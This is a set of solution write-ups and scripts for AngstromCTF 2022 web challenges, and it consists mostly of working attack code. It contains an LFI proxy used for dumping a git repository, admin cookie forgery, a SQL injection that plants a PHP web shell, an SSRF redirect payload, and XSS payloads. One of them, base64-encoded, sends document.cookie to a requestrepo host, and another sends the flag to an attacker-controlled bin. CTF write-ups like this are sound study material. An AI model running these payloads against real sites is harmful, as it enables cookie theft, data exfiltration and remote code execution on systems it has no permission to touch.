Angstromctf 2022 - Solution web challange

Art Gallery.md

Challenge Art Gallery (LFI)

• File app.py

from flask import Flask, Response
import requests

app = Flask(__name__)

@app.route('/<path:f>')
def index(f):
    res = requests.get("https://art-gallery.web.actf.co/gallery?member=../" + f)
    if res.headers['content-type'] == 'application/octet-stream':
        return res.content
    else:
        return Response(status=404)
app.run(debug=True)

• Download GitTools

• How to run:

  • python3 app.py
  • ./gitdumper.sh http://localhost:5000/.git/ .
  • mv .git/ ../Extractor/
  • ./extractor.sh . .

• Flag in folder: 1-56449caeb7973b88f20d67b4c343cbb895aa6bc7 -> actf{lfi_me_alone_and_git_out_341n4kaf5u59v}

AuthSkip.py

import requests

URL = 'https://auth-skip.web.actf.co/'

cookies = {'user':'admin'}

r = requests.get(URL,cookies=cookies)
print(r.text)

# actf{passwordless_authentication_is_the_new_hip_thing}

Cliche.js

// Decode base64 and change to YOUR_VPS
// ?content=[payload bellow]
[<form id="<svg onload=eval(atob(location.hash.slice(1)))>](">)#ZmV0Y2goJ2h0dHBzOi8vejhmeGlqbjEucmVxdWVzdHJlcG8uY29tP2NjPScrZG9jdW1lbnQuY29va2llKQ==

crumbs.py

import requests

URL = 'https://crumbs.web.actf.co'

path = '61f57d99-6d8e-4e5e-bfc1-995dc358fce7'
while True:
    # print(path)
    r = requests.get(URL+f'/{path}')
    path = r.text[6:]
    if 'actf' in r.text:
        print(path)
        print(r.text)
        break

# actf{w4ke_up_to_th3_m0on_6bdc10d7c6d5}

NoFlags.py

import requests

URL = 'https://no-flags.web.actf.co'

def upShell():
    data = {"flag":"a'); ATTACH DATABASE '/var/www/html/abyss/taidh.php' AS a; CREATE TABLE a.b (c text); INSERT INTO a.b (c) VALUES (\"<?php system($_GET[0]); ?>\");-- -"}
    r = requests.post(URL, data=data)
    # print(r.text)

def loadShell():
    params = {"0":"/printflag"}
    r = requests.get(URL+'/abyss/taidh.php',params=params)
    print(r.text)

if __name__ == '__main__':
    upShell()
    loadShell()

School Unblocker.md

Challeng School Unblocker (SSRF)

• Requestrepo

• Or you can use this payload host on YOUR_VPS

<?php
header("Location: http://localhost:8080/flag",true,307);
?>

• File ex.py

import requests

URL = 'https://school-unblocker.web.actf.co/proxy'
data = {"url":"http://fyn5eg2n.requestrepo.com"} #change YOUR IP VPS

r = requests.post(URL, data=data)
print(r.text)

SecureVault.py

# Vulnerable : Revoked token

import requests

URL = 'https://secure-vault.web.actf.co'

def register(username,password):
    data = {"username":username,"password":password}
    r = requests.post(URL+'/register', data=data,allow_redirects=False)
    return r.cookies['token']

def deleteToken(token):
    cookies = {'token':token}
    r = requests.post(URL+'/delete',cookies=cookies)

def getFlag(token):
    cookies = {'token':token}
    r = requests.get(URL+'/vault',cookies=cookies)
    return r.text

if __name__ == '__main__':
    token = register("taidh","taidh")
    deleteToken(token)
    print(getFlag(token))

TheFlash.md

Challenge The Flash

• Run payload in console

setInterval(() => {
    const _0x24a935 = _0x15c166;
    Math[_0x24a935(0xd1, '&EwH')]() < 0.05 && (x[_0x24a935(0xdc, '1WY2')] = [0x73, 0x71, 0x80, 0x6e, 0x89, 0x81, 0x84, 0x41, 0x41, 0x70, 0x8b, 0x65, 0x78, 0x43, 0x79, 0x6f, 0x65, 0x80, 0x7c, 0x41, 0x65, 0x6e, 0x78, 0x40, 0x81, 0x7c, 0x87][_0x24a935(0xdb, 'H3tY')](_0x4cabe2 => String[_0x24a935(0xd8, 'Ceiy')](_0x4cabe2 - 0xd ^ 0x7))[_0x24a935(0xe0, '1WY2')](''), setTimeout(() => x[_0x24a935(0xe3, '5HF&')] = _0x24a935(0xde, '($xo'), 0xffff));
}, 1);

• Flag: actf{sp33dy_l1ke_th3_fl4sh}

XtraSaltySardines.md

Challenge Xtra Salty Sardines (XSS)

<script><script>fetch(`/flag`).then(r=>r.text()).then(t=>fetch(`https://[YOUR_REQUESTBIN]?cc=`+btoa(t)))</script>

• Flag: actf{those_sardines_are_yummy_yummy_in_my_tummy}